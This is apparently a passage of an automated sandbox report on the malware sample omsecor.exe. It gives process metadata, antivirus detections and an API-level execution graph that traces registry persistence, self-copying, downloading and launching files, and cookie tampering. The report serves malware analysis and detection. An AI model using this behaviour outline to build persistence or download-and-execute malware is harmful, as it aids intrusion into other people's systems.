                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:11:22:20
                                                                                                                                                                                                              Start date:01/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\System32\omsecor.exe
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:82'768 bytes
                                                                                                                                                                                                              MD5 hash:1FB6FB78751B952FE1D6BEBA89C93830
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:11:22:58
                                                                                                                                                                                                              Start date:01/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\omsecor.exe /nomove
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:82'768 bytes
                                                                                                                                                                                                              MD5 hash:1FB6FB78751B952FE1D6BEBA89C93830
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:2.3%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:11.9%
                                                                                                                                                                                                                Total number of Nodes:1144
                                                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                                                execution_graph 6110 404ec0 6134 40821c 6110->6134 6112 404edf 6113 404f04 6112->6113 6114 404ef4 6112->6114 6117 404efd 6112->6117 6141 40c519 6113->6141 6137 404e7b 6114->6137 6118 405111 6119 40c5b9 SysFreeString 6118->6119 6119->6117 6120 4050f2 6160 40c5b9 6120->6160 6123 40c5b9 SysFreeString 6124 405103 6123->6124 6125 40c5b9 SysFreeString 6124->6125 6126 405109 6125->6126 6127 40c5b9 SysFreeString 6126->6127 6127->6118 6128 404f0b 6128->6117 6128->6118 6128->6120 6148 40c43d 6128->6148 6133 4050e2 6157 40be3a 6133->6157 6135 408220 6134->6135 6136 408233 PathCombineW 6134->6136 6135->6136 6136->6112 6138 404e93 6137->6138 6163 408248 6138->6163 6177 40c4b4 CoCreateInstance 6141->6177 6144 40c589 6144->6128 6145 40c531 VariantInit SysAllocString 6145->6144 6147 40c551 VariantClear 6145->6147 6147->6144 6179 40bf60 6148->6179 6151 4050ce 6151->6133 6153 40c00b 6151->6153 6152 40be3a HeapFree 6152->6151 6154 40c01a 6153->6154 6156 40c03b 6153->6156 6155 40bde1 3 API calls 6154->6155 6155->6156 6156->6133 6158 40be41 HeapFree 6157->6158 6159 40be53 6157->6159 6158->6159 6159->6120 6161 40c5c0 SysFreeString 6160->6161 6162 4050fb 6160->6162 6161->6162 6162->6123 6164 40821c PathCombineW 6163->6164 6165 408268 6164->6165 6166 408272 FindFirstFileW 6165->6166 6167 404eb9 6165->6167 6166->6167 6174 408292 6166->6174 6167->6117 6168 4082a2 WaitForSingleObject 6169 4083b6 FindClose 6168->6169 6168->6174 6169->6167 6170 40839e FindNextFileW 6170->6169 6170->6174 6171 408306 PathMatchSpecW 6171->6174 6172 40821c PathCombineW 6172->6174 6173 408374 Sleep 6173->6174 6174->6168 6174->6169 6174->6170 6174->6171 6174->6172 6174->6173 6175 40833f Sleep 6174->6175 6176 408248 PathCombineW 6174->6176 6175->6174 6176->6174 6178 40c4dd 6177->6178 6178->6144 6178->6145 6180 40bf72 6179->6180 6181 40bfbf 6180->6181 6183 40bfa7 wvnsprintfW 6180->6183 6184 40bde1 6180->6184 6181->6151 6181->6152 6183->6180 6185 40bdf2 6184->6185 6186 40bde5 6184->6186 6188 40be0c HeapReAlloc 6185->6188 6189 40bdfc HeapAlloc 6185->6189 6187 40be3a HeapFree 6186->6187 6190 40bdec 6187->6190 6188->6190 6189->6190 6190->6180 6821 409402 6822 409415 6821->6822 6823 409419 6822->6823 6824 409437 SysFreeString 6822->6824 6824->6823 6825 409883 6826 409890 6825->6826 6827 409655 __VEC_memcpy 6826->6827 6828 4098ad 6827->6828 6829 409655 __VEC_memcpy 6828->6829 6830 4098c7 6828->6830 6829->6830 6191 409445 6193 40945a 6191->6193 6192 40945e 6193->6192 6194 4094a0 SysFreeString SysFreeString 6193->6194 6194->6192 5706 40b346 5751 40d5b0 5706->5751 5709 40b37e 5736 40b3db 5709->5736 5798 40ac20 RegOpenKeyExW 5709->5798 5713 40b394 GetModuleFileNameW 5806 4069fd RegCreateKeyExW 5713->5806 5718 40b3c5 5810 40a786 5718->5810 5719 40b3ca GetLastError 5719->5718 5720 40b3f2 Sleep 5722 40a786 35 API calls 5720->5722 5723 40b407 GetModuleFileNameW 5722->5723 5725 40ac20 4 API calls 5723->5725 5737 40b3d8 5725->5737 5726 40b45c 5728 40ac20 4 API calls 5726->5728 5730 40b468 5728->5730 5729 40b426 CopyFileW 5731 40b43f 5729->5731 5729->5736 5734 407727 54 API calls 5730->5734 5735 4077f0 CreateProcessW 5731->5735 5732 40b4b9 ExpandEnvironmentStringsW 5732->5736 5733 40b4cf GetModuleFileNameW 5733->5737 5738 40b474 5734->5738 5750 40b44b 5735->5750 5736->5720 5736->5726 5736->5732 5736->5733 5744 40b44c ExitProcess 5736->5744 5745 40b4fe GetLastError 5736->5745 5753 40b2ce OleInitialize 5736->5753 5762 40aafd 5736->5762 5771 40ab7c GetModuleFileNameW CharLowerW 5736->5771 5776 40abd9 5736->5776 5782 407727 5736->5782 5795 4077f0 5736->5795 5737->5729 5737->5736 5739 40b498 GetLastError 5738->5739 5740 40b47a 5738->5740 5743 40b4a3 5739->5743 5742 4077f0 CreateProcessW 5740->5742 5746 40b486 5742->5746 5747 40a786 35 API calls 5743->5747 5748 40a786 35 API calls 5745->5748 5746->5744 5749 40b48b GetLastError 5746->5749 5747->5750 5748->5737 5749->5743 5750->5744 5752 40b353 GetModuleFileNameW 5751->5752 5752->5709 5755 40b2e2 5753->5755 5757 40b325 InternetCloseHandle 5755->5757 5826 407552 5755->5826 5829 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5755->5829 5834 40ac93 5755->5834 5851 40b096 5755->5851 5887 40a6c9 5757->5887 5763 40d5b0 5762->5763 5764 40ab0a GetCommandLineW 5763->5764 5765 40ab1a 5764->5765 5766 40ab1f 5765->5766 5767 40ac20 4 API calls 5765->5767 5766->5736 5768 40ab30 5767->5768 5768->5766 5769 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5768->5769 5770 40ab73 5769->5770 5770->5766 5772 40abb6 5771->5772 5773 40abc0 GetCommandLineW 5772->5773 5774 40abbb 5772->5774 5775 40abd0 5773->5775 5774->5736 5775->5736 5777 40ac20 4 API calls 5776->5777 5778 40abf2 5777->5778 5779 40abf7 FindFirstFileW 5778->5779 5780 40ac1a 5778->5780 5779->5780 5781 40ac0e FindClose 5779->5781 5780->5736 5781->5780 5783 40d5b0 5782->5783 5784 407731 GetModuleFileNameW 5783->5784 5785 407753 5784->5785 5786 40776d 5784->5786 5787 4075d4 15 API calls 5785->5787 5788 407774 ExpandEnvironmentStringsW 5786->5788 5790 407764 5786->5790 5791 4077a7 GetLastError 5786->5791 5793 4077bc GetLastError 5786->5793 5787->5790 6096 4075d4 CreateFileW 5788->6096 5790->5736 5792 4077ca 5791->5792 5792->5786 5794 40a786 35 API calls 5792->5794 5793->5792 5794->5792 6106 40d530 5795->6106 5797 407805 CreateProcessW 5797->5736 5799 40ac60 RegOpenKeyExW 5798->5799 5800 40ac4a 5798->5800 5802 40ac78 5799->5802 5803 40ac7c 5799->5803 6108 4069c0 RegQueryValueExW RegCloseKey 5800->6108 5802->5713 5802->5736 6109 4069c0 RegQueryValueExW RegCloseKey 5803->6109 5805 40ac5a 5805->5799 5805->5802 5807 406a30 5806->5807 5808 406a2c 5806->5808 5809 406a39 RegSetValueExW RegCloseKey 5807->5809 5808->5718 5808->5719 5809->5808 5812 40a79c 5810->5812 5814 40a7b3 5810->5814 5811 406d14 2 API calls 5811->5812 5812->5811 5813 40a79e Sleep 5812->5813 5812->5814 5813->5812 5815 406cb5 GetVersionExW 5814->5815 5816 40a83f 5815->5816 5817 4078cb 12 API calls 5816->5817 5818 40a873 5817->5818 5819 40a718 5 API calls 5818->5819 5823 40a87b 5819->5823 5820 40a744 5 API calls 5820->5823 5821 40a894 Sleep 5821->5823 5822 406e69 22 API calls 5822->5823 5823->5820 5823->5821 5823->5822 5824 40a8c7 Sleep 5823->5824 5825 40a8e1 GetProcessHeap HeapFree 5823->5825 5824->5823 5825->5737 5891 40584d 5826->5891 5828 407557 Sleep 5828->5755 5830 4073dd SystemTimeToFileTime SystemTimeToFileTime 5829->5830 5832 407432 5830->5832 5833 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5832->5833 5833->5755 5892 406d14 InternetAttemptConnect 5834->5892 5836 40aca4 5837 40aca9 Sleep 5836->5837 5838 40acbd 5836->5838 5839 406d14 2 API calls 5837->5839 5895 4078cb 5838->5895 5839->5836 5841 40acd4 5902 406cb5 GetVersionExW 5841->5902 5843 40ad09 5904 40a718 5843->5904 5847 40ad71 Sleep 5850 40ad4c 5847->5850 5848 40ad9f Sleep 5848->5850 5849 40adbc 5849->5755 5850->5847 5850->5848 5850->5849 5908 40a744 5850->5908 5912 406e69 5850->5912 5852 40b0a3 5851->5852 5853 40b0bd 5852->5853 5854 40b0cf 5852->5854 5881 40b0ae 5852->5881 6016 407995 5853->6016 6023 407951 5854->6023 5857 40b177 InternetClearAllPerSiteCookieDecisions 5860 40b17d 5857->5860 5858 40b168 InternetSetPerSiteCookieDecisionW 5858->5860 5859 40b0cd 5861 40b0fb GetModuleFileNameW 5859->5861 5873 40b155 5859->5873 6044 4032b8 5860->6044 5863 40b116 GetCurrentDirectoryW 5861->5863 5870 40b10d 5861->5870 5863->5870 5865 40b186 GetLastError 5867 40a786 35 API calls 5865->5867 5866 40b196 5868 40b1b0 CreateThread 5866->5868 5869 40b1e1 5866->5869 5867->5866 5868->5866 5872 40b221 5869->5872 5874 40a786 35 API calls 5869->5874 6028 40253c 5870->6028 5875 40b228 CloseHandle 5872->5875 5876 40b23d 5872->5876 5873->5857 5873->5858 5873->5881 5877 40b1f7 5874->5877 5875->5875 5875->5876 5878 40a6c9 InternetCloseHandle 5876->5878 5877->5872 5880 40b212 WaitForMultipleObjects 5877->5880 5879 40b242 InternetClearAllPerSiteCookieDecisions 5878->5879 5879->5881 5882 40b24d 5879->5882 5880->5872 5881->5755 5882->5881 5883 40b261 GetModuleFileNameW 5882->5883 5884 40b27c GetCurrentDirectoryW 5883->5884 5885 40b273 5883->5885 5884->5885 5886 40253c 50 API calls 5885->5886 5886->5881 5890 40a6cf 5887->5890 5888 40a6fc InternetCloseHandle 5888->5890 5889 40a716 ExitProcess 5890->5888 5890->5889 5891->5828 5893 406d22 5892->5893 5894 406d26 InternetOpenW 5892->5894 5893->5836 5894->5836 5924 407e2b 5895->5924 5897 407900 5897->5841 5898 4078dd 5898->5897 5930 40782a GetModuleFileNameW CreateFileW 5898->5930 5900 4078ec 5900->5897 5934 407d61 5900->5934 5903 406cf6 5902->5903 5903->5843 5905 40a722 5904->5905 5906 40a739 5905->5906 5946 4079ff 5905->5946 5906->5850 5909 40a75d 5908->5909 5910 4079ff 5 API calls 5909->5910 5911 40a76e 5909->5911 5910->5911 5911->5850 5913 40d5b0 5912->5913 5914 406e76 GetTickCount 5913->5914 5915 406e92 5914->5915 5952 407b4e 5915->5952 5917 406f49 5961 409c99 5917->5961 5921 407017 5921->5850 5922 406ff4 5922->5921 5977 407a3c 5922->5977 5925 407e3d 5924->5925 5926 407e4e SetFilePointer ReadFile 5924->5926 5940 407cd7 5925->5940 5929 407e7e 5926->5929 5928 407e44 5928->5926 5928->5929 5929->5898 5931 407871 GetFileTime CloseHandle 5930->5931 5932 407888 GetTickCount 5930->5932 5933 407893 5931->5933 5932->5933 5933->5900 5935 407d70 5934->5935 5936 407d77 5934->5936 5937 407cd7 3 API calls 5935->5937 5938 407d81 5936->5938 5939 407dfa SetFilePointer WriteFile 5936->5939 5937->5936 5938->5897 5939->5897 5941 40d5b0 5940->5941 5942 407ce4 GetModuleFileNameW 5941->5942 5943 407d0d GetCurrentDirectoryW 5942->5943 5944 407d00 5942->5944 5943->5944 5945 407d36 CreateFileW 5944->5945 5945->5928 5949 407908 5946->5949 5948 407a05 5948->5905 5950 407e2b 5 API calls 5949->5950 5951 407919 5950->5951 5951->5948 5987 407267 5952->5987 5954 407b63 5955 407e2b 5 API calls 5954->5955 5956 407b83 5954->5956 5955->5956 5957 407c6b 5956->5957 5992 40bcb4 5956->5992 6002 40bd55 5957->6002 5963 409ca6 5961->5963 5962 409cbb InternetOpenUrlW 5964 409cdf GetProcessHeap HeapAlloc 5962->5964 5965 406fe2 5962->5965 5963->5962 5964->5965 5966 409d5b InternetReadFile 5964->5966 5965->5921 5973 406e00 5965->5973 5967 409d79 GetProcessHeap HeapAlloc 5966->5967 5968 409d0b 5966->5968 5971 409d92 GetProcessHeap HeapFree 5967->5971 5968->5966 5968->5967 5969 409d1f GetProcessHeap HeapReAlloc 5968->5969 5972 40c5d0 __VEC_memcpy 5968->5972 5969->5965 5969->5968 5971->5965 5972->5968 5974 406e12 5973->5974 5975 40c5d0 __VEC_memcpy 5974->5975 5976 406e21 5975->5976 5976->5922 5978 407a4f 5977->5978 5979 40c5d0 __VEC_memcpy 5978->5979 5986 407b42 5978->5986 5980 407a7d 5979->5980 5981 407267 3 API calls 5980->5981 5980->5986 5982 407b17 5981->5982 5983 407267 3 API calls 5982->5983 5984 407b20 5983->5984 5985 407d61 5 API calls 5984->5985 5985->5986 5986->5921 5988 407284 5987->5988 5989 407278 GetSystemTime 5987->5989 5990 40728b SystemTimeToFileTime SystemTimeToFileTime 5988->5990 5989->5990 5991 4072e8 __aulldiv 5990->5991 5991->5954 5993 40bcd3 5992->5993 5994 40bd17 5993->5994 6008 40c5d0 5993->6008 5995 40bd3a 5994->5995 5997 40b51c __VEC_memcpy 5994->5997 5996 40bd4d 5995->5996 5998 40c5d0 __VEC_memcpy 5995->5998 5996->5957 5997->5994 5998->5996 6003 40bd5c 6002->6003 6003->6003 6004 40bd9e 6003->6004 6006 40bcb4 __VEC_memcpy 6003->6006 6005 40bcb4 __VEC_memcpy 6004->6005 6007 407c7c 6005->6007 6006->6004 6007->5917 6009 40c5e8 6008->6009 6010 40bcf9 6009->6010 6011 40c60f __VEC_memcpy 6009->6011 6010->5996 6012 40b51c 6010->6012 6011->6010 6013 40b543 6012->6013 6014 40b552 6012->6014 6015 40c5d0 __VEC_memcpy 6013->6015 6014->5994 6015->6014 6022 4079a2 6016->6022 6017 4079f1 6018 407951 36 API calls 6017->6018 6019 4079fc 6018->6019 6019->5859 6020 407e2b 5 API calls 6020->6022 6022->6017 6022->6020 6051 40791c 6022->6051 6025 407965 6023->6025 6024 407e2b 5 API calls 6024->6025 6025->6024 6026 40798e 6025->6026 6027 40791c 36 API calls 6025->6027 6026->5859 6027->6025 6029 402549 6028->6029 6031 402572 6029->6031 6032 406d14 2 API calls 6029->6032 6037 402561 Sleep 6029->6037 6030 402584 DeleteFileW 6034 402594 6030->6034 6040 4025ba 6030->6040 6031->6030 6033 40a786 35 API calls 6031->6033 6032->6029 6035 402581 6033->6035 6038 4025c1 6034->6038 6039 4025ad Sleep 6034->6039 6057 407036 DeleteFileW CreateFileW 6034->6057 6035->6030 6037->6029 6041 40a786 35 API calls 6038->6041 6043 4025d0 _memset 6038->6043 6039->6034 6039->6040 6040->5873 6041->6043 6042 402630 CreateProcessW 6042->6040 6043->6042 6068 406a68 RegOpenKeyExW 6044->6068 6049 403351 GetProcAddress GetProcAddress GetProcAddress 6050 403386 6049->6050 6050->5865 6050->5866 6052 407d61 5 API calls 6051->6052 6053 407930 6052->6053 6054 407939 GetLastError 6053->6054 6055 407949 6053->6055 6056 40a786 35 API calls 6054->6056 6055->6022 6056->6055 6058 407078 GetLastError 6057->6058 6063 40706b 6057->6063 6059 407095 InternetOpenUrlW 6058->6059 6060 407089 SetEndOfFile 6058->6060 6061 4070c6 InternetQueryDataAvailable 6059->6061 6062 4070b8 CloseHandle 6059->6062 6060->6059 6064 407119 InternetReadFile 6061->6064 6062->6063 6063->6034 6065 407123 CloseHandle InternetCloseHandle 6064->6065 6066 4070ed 6064->6066 6065->6063 6066->6065 6067 4070f2 WriteFile 6066->6067 6067->6064 6069 406a9a 6068->6069 6073 4032c4 6068->6073 6092 4069c0 RegQueryValueExW RegCloseKey 6069->6092 6071 406aaa 6072 4069fd 3 API calls 6071->6072 6071->6073 6072->6073 6074 406adf 6073->6074 6075 406aec 6074->6075 6076 406b11 RegOpenKeyExW 6075->6076 6077 406b34 6076->6077 6085 4032ce 6 API calls 6076->6085 6093 4069c0 RegQueryValueExW RegCloseKey 6077->6093 6079 406b49 6080 406b78 RegOpenKeyExW 6079->6080 6079->6085 6081 406b96 6080->6081 6082 406ba6 6080->6082 6094 4069c0 RegQueryValueExW RegCloseKey 6081->6094 6084 4069fd 3 API calls 6082->6084 6086 406bc3 6082->6086 6084->6086 6085->6049 6085->6050 6086->6085 6087 406c03 RegOpenKeyExW 6086->6087 6088 406c21 6087->6088 6091 406c31 6087->6091 6095 4069c0 RegQueryValueExW RegCloseKey 6088->6095 6090 4069fd 3 API calls 6090->6085 6091->6085 6091->6090 6092->6071 6093->6079 6094->6082 6095->6091 6097 40760a CreateFileW 6096->6097 6098 407622 6096->6098 6097->6098 6099 40762a GetFileSize GetProcessHeap RtlAllocateHeap 6097->6099 6098->5786 6099->6098 6100 407650 ReadFile 6099->6100 6100->6098 6101 40766a 6100->6101 6101->6098 6102 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6101->6102 6105 40584d 6102->6105 6104 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6104->6098 6105->6104 6107 40d53c __VEC_memzero 6106->6107 6107->5797 6108->5805 6109->5802 6831 401006 6832 40101f 6831->6832 6833 407499 5 API calls 6832->6833 6836 4010c1 6832->6836 6834 4010ce 6833->6834 6835 407552 Sleep 6834->6835 6834->6836 6835->6836 6837 409a07 6840 409a14 6837->6840 6838 409a92 6839 409a6d SysAllocString 6839->6838 6840->6838 6840->6839 6841 403287 6842 4032aa 6841->6842 6843 403292 6841->6843 6843->6842 6845 408604 RegOpenKeyExW 6843->6845 6846 408632 6845->6846 6847 40864a GetLastError 6845->6847 6855 4069c0 RegQueryValueExW RegCloseKey 6846->6855 6849 408654 6847->6849 6850 408658 6847->6850 6849->6843 6852 408682 DeleteFileW 6850->6852 6853 40866a 6850->6853 6851 408646 6851->6847 6852->6849 6854 4069fd 3 API calls 6853->6854 6854->6849 6855->6851 6865 40ce08 6866 40ce1a 6865->6866 6868 40ce28 @_EH4_CallFilterFunc@8 6865->6868 6867 40cd66 __except_handler4 5 API calls 6866->6867 6867->6868 6869 409909 6870 409916 6869->6870 6877 409723 6870->6877 6872 409a02 6873 409934 6873->6872 6874 409723 __VEC_memcpy 6873->6874 6875 4099d5 6874->6875 6875->6872 6876 4099de SysAllocString SysAllocString 6875->6876 6876->6872 6878 409733 6877->6878 6879 40c5d0 __VEC_memcpy 6878->6879 6880 409772 6878->6880 6879->6880 6880->6873 6195 4047cc 6196 40821c PathCombineW 6195->6196 6197 4047f1 6196->6197 6198 40483b 6197->6198 6199 404800 6197->6199 6200 404843 6197->6200 6203 408248 8 API calls 6199->6203 6219 4083c4 CreateFileW 6200->6219 6203->6198 6206 404a61 6208 404a79 6206->6208 6209 404a69 VirtualFree 6206->6209 6207 40487b HeapAlloc 6216 404896 6207->6216 6208->6198 6210 404a7f CloseHandle 6208->6210 6209->6208 6210->6198 6211 404a4a 6212 40be3a HeapFree 6211->6212 6213 404a53 6212->6213 6240 40be54 6213->6240 6215 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6215->6216 6216->6211 6216->6215 6218 40c00b 3 API calls 6216->6218 6235 40c3f9 6216->6235 6218->6216 6220 4083ea GetFileSizeEx 6219->6220 6223 404854 6219->6223 6221 4083f9 6220->6221 6222 40844f CloseHandle 6220->6222 6221->6222 6221->6223 6224 40840e VirtualAlloc 6221->6224 6222->6223 6223->6198 6228 40c290 6223->6228 6224->6222 6225 408423 ReadFile 6224->6225 6226 408441 VirtualFree 6225->6226 6227 408439 6225->6227 6226->6222 6227->6223 6227->6226 6229 40486e 6228->6229 6234 40c2b6 6228->6234 6229->6206 6229->6207 6230 40bde1 3 API calls 6230->6234 6231 40c340 6232 40be54 HeapFree 6231->6232 6232->6229 6234->6229 6234->6230 6234->6231 6246 40c05c 6234->6246 6236 40c402 6235->6236 6237 40c407 6235->6237 6236->6216 6238 40c412 wvnsprintfW 6237->6238 6239 40c42e 6238->6239 6239->6216 6242 40be5b 6240->6242 6245 40be73 6240->6245 6241 40be3a HeapFree 6241->6242 6242->6241 6243 40be6d 6242->6243 6242->6245 6244 40be3a HeapFree 6243->6244 6244->6245 6245->6206 6247 40c066 6246->6247 6248 40c06a 6246->6248 6247->6234 6248->6247 6251 40be27 HeapAlloc 6248->6251 6250 40c086 6250->6234 6251->6250 6881 40978d 6882 40979a 6881->6882 6883 409655 __VEC_memcpy 6882->6883 6884 4097b3 6883->6884 6885 4097ba 6884->6885 6886 409655 __VEC_memcpy 6884->6886 6887 4097d6 6886->6887 6888 409805 6887->6888 6889 4097df SysAllocString SysAllocString 6887->6889 6889->6888 6890 402d0e 6891 40267a 122 API calls 6890->6891 6892 402d32 6891->6892 6895 409c6f 6892->6895 6896 402d3a 6895->6896 6897 409c7a SysFreeString 6895->6897 6897->6896 6897->6897 6898 40350f 6899 40821c PathCombineW 6898->6899 6900 403531 6899->6900 6901 40354d 6900->6901 6902 403540 6900->6902 6903 403553 HeapAlloc 6900->6903 6904 4034a8 8 API calls 6902->6904 6903->6901 6905 403576 GetPrivateProfileStringW 6903->6905 6904->6901 6906 403594 6905->6906 6907 40372c 6905->6907 6906->6907 6909 4035a8 HeapAlloc 6906->6909 6908 40be3a HeapFree 6907->6908 6908->6901 6909->6907 6916 4035c5 6909->6916 6910 403627 GetPrivateProfileStringW 6911 403643 GetPrivateProfileIntW 6910->6911 6910->6916 6912 403669 GetPrivateProfileStringW 6911->6912 6911->6916 6913 40368b GetPrivateProfileStringW 6912->6913 6912->6916 6913->6916 6914 403723 6915 40be3a HeapFree 6914->6915 6915->6907 6916->6910 6916->6914 6917 40c3f9 wvnsprintfW 6916->6917 6918 40c00b 3 API calls 6916->6918 6917->6916 6918->6916 6252 40cbd0 6253 40cc08 6252->6253 6254 40cbfb 6252->6254 6256 40cd66 __except_handler4 5 API calls 6253->6256 6270 40cd66 6254->6270 6259 40cc18 __except_handler4 6256->6259 6257 40cc9f 6258 40cc74 __except_handler4 6258->6257 6260 40cc8f 6258->6260 6262 40cd66 __except_handler4 5 API calls 6258->6262 6259->6257 6259->6258 6264 40ccb5 __except_handler4 6259->6264 6261 40cd66 __except_handler4 5 API calls 6260->6261 6261->6257 6262->6260 6278 40ce9a RtlUnwind 6264->6278 6265 40ccf4 __except_handler4 6266 40cd2b 6265->6266 6267 40cd66 __except_handler4 5 API calls 6265->6267 6268 40cd66 __except_handler4 5 API calls 6266->6268 6267->6266 6269 40cd3b __except_handler4 6268->6269 6271 40cd70 IsDebuggerPresent 6270->6271 6272 40cd6e 6270->6272 6280 40d247 6271->6280 6272->6253 6275 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6276 40d0f3 __except_handler4 6275->6276 6277 40d0fb GetCurrentProcess TerminateProcess 6275->6277 6276->6277 6277->6253 6279 40ceaf 6278->6279 6279->6265 6280->6275 6925 40d990 6926 40d993 VirtualQuery 6925->6926 6928 40d9b2 6926->6928 6930 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6926->6930 6929 40d9cc GetVersionExA 6928->6929 6928->6930 6929->6930 6281 401652 6282 401665 6281->6282 6286 4016f6 6282->6286 6287 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6282->6287 6284 4016da 6285 407552 Sleep 6284->6285 6284->6286 6285->6286 6288 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6287->6288 6288->6284 6931 402214 6934 402233 6931->6934 6932 402319 6933 402386 6932->6933 6939 401c41 6932->6939 6934->6932 6936 408091 3 API calls 6934->6936 6936->6932 6937 402478 6937->6933 6938 408091 3 API calls 6937->6938 6938->6933 6944 401c4e 6939->6944 6940 401e07 6943 407267 3 API calls 6940->6943 6945 401d15 6940->6945 6941 401d0e 6942 407267 3 API calls 6941->6942 6942->6945 6943->6945 6944->6940 6944->6941 6945->6937 6289 402dd5 6292 40267a 6289->6292 6298 40268a 6292->6298 6293 4027dd 6294 4026ee GetTickCount 6294->6298 6297 407552 Sleep 6297->6298 6298->6293 6298->6294 6298->6297 6299 4027e6 OleInitialize 6298->6299 6360 40a8f9 6298->6360 6377 40a469 6299->6377 6301 402806 6309 40280b 6301->6309 6384 40a345 6301->6384 6304 402851 6390 40a65e 6304->6390 6305 40285f 6307 40286e 6305->6307 6393 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6305->6393 6395 409f2b 6307->6395 6309->6298 6311 402884 6312 4028b4 6311->6312 6316 402943 6311->6316 6403 408f26 6311->6403 6312->6316 6317 408f26 10 API calls 6312->6317 6314 402c20 6315 40a65e Sleep 6314->6315 6315->6309 6316->6314 6324 4029aa 6316->6324 6428 4089fd 6316->6428 6318 4028ea 6317->6318 6320 4028f1 6318->6320 6321 402956 6318->6321 6319 4029e6 6322 402a3b 6319->6322 6437 40920a 6319->6437 6327 402904 SysAllocString 6320->6327 6325 40a65e Sleep 6321->6325 6328 402a6f 6322->6328 6333 408f26 10 API calls 6322->6333 6324->6319 6329 4089fd 5 API calls 6324->6329 6325->6316 6331 402927 SysFreeString 6327->6331 6332 40293a 6327->6332 6334 402aa2 6328->6334 6337 408f26 10 API calls 6328->6337 6329->6319 6330 402a17 6442 409c49 6330->6442 6331->6331 6331->6332 6332->6316 6422 4091bd 6332->6422 6336 402a62 SysAllocString 6333->6336 6338 408f26 10 API calls 6334->6338 6340 402ad1 6334->6340 6336->6328 6343 402a95 SysAllocString 6337->6343 6344 402ac4 SysAllocString 6338->6344 6339 402b04 6346 40a65e Sleep 6339->6346 6340->6339 6345 408f26 10 API calls 6340->6345 6343->6334 6344->6340 6347 402af7 SysAllocString 6345->6347 6348 402b0e 6346->6348 6347->6339 6349 409c49 SysAllocString 6348->6349 6350 402b6b 6348->6350 6349->6350 6351 409c49 SysAllocString 6350->6351 6352 402b83 6350->6352 6351->6352 6353 402be3 6352->6353 6354 402bea 6352->6354 6445 408825 6353->6445 6469 408692 6354->6469 6357 402be8 SysFreeString 6357->6314 6359 402c11 SysFreeString 6357->6359 6359->6314 6359->6359 6361 40a906 6360->6361 6362 406d14 2 API calls 6361->6362 6363 40a917 Sleep 6361->6363 6364 40a92c 6361->6364 6362->6361 6363->6361 6365 4078cb 12 API calls 6364->6365 6366 40aa37 6365->6366 6367 406cb5 GetVersionExW 6366->6367 6368 40aa52 6367->6368 6369 40a718 5 API calls 6368->6369 6370 40aa7e 6369->6370 6371 40a744 5 API calls 6370->6371 6373 40aa91 6371->6373 6372 406e69 22 API calls 6372->6373 6373->6372 6374 40aabc Sleep 6373->6374 6375 40aae5 GetProcessHeap HeapFree 6373->6375 6376 40a744 5 API calls 6373->6376 6374->6373 6375->6298 6376->6373 6378 40a479 6377->6378 6380 40a4ef 6378->6380 6381 40a4dc 6378->6381 6485 40a156 6378->6485 6380->6301 6381->6380 6382 40a530 InternetOpenW 6381->6382 6382->6380 6383 40a545 InternetSetOptionW 6382->6383 6383->6380 6386 40a352 6384->6386 6385 40284a 6385->6304 6385->6305 6386->6385 6387 40a442 6386->6387 6502 40a245 6386->6502 6387->6385 6510 40a2d9 6387->6510 6392 40a662 Sleep 6390->6392 6392->6309 6394 40735e __aulldiv 6393->6394 6394->6307 6396 409f37 6395->6396 6397 409f40 GetTickCount 6396->6397 6398 409f5f GetTickCount 6397->6398 6399 409fa7 6398->6399 6400 409f67 PeekMessageW 6398->6400 6399->6311 6401 409f88 Sleep 6400->6401 6402 409f7c DispatchMessageW 6400->6402 6401->6398 6402->6400 6526 40a582 6403->6526 6405 408f35 6406 408f78 SysFreeString 6405->6406 6411 408f3e 6405->6411 6419 408f96 6405->6419 6406->6406 6406->6419 6407 409039 6408 409040 6407->6408 6409 409043 SysFreeString 6407->6409 6410 409058 6407->6410 6408->6409 6409->6411 6412 409091 GetTickCount 6410->6412 6413 40905f 6410->6413 6411->6312 6421 4090ae 6412->6421 6414 40908f 6413->6414 6415 40906a SysAllocString 6413->6415 6417 409108 SysFreeString 6414->6417 6418 40911b 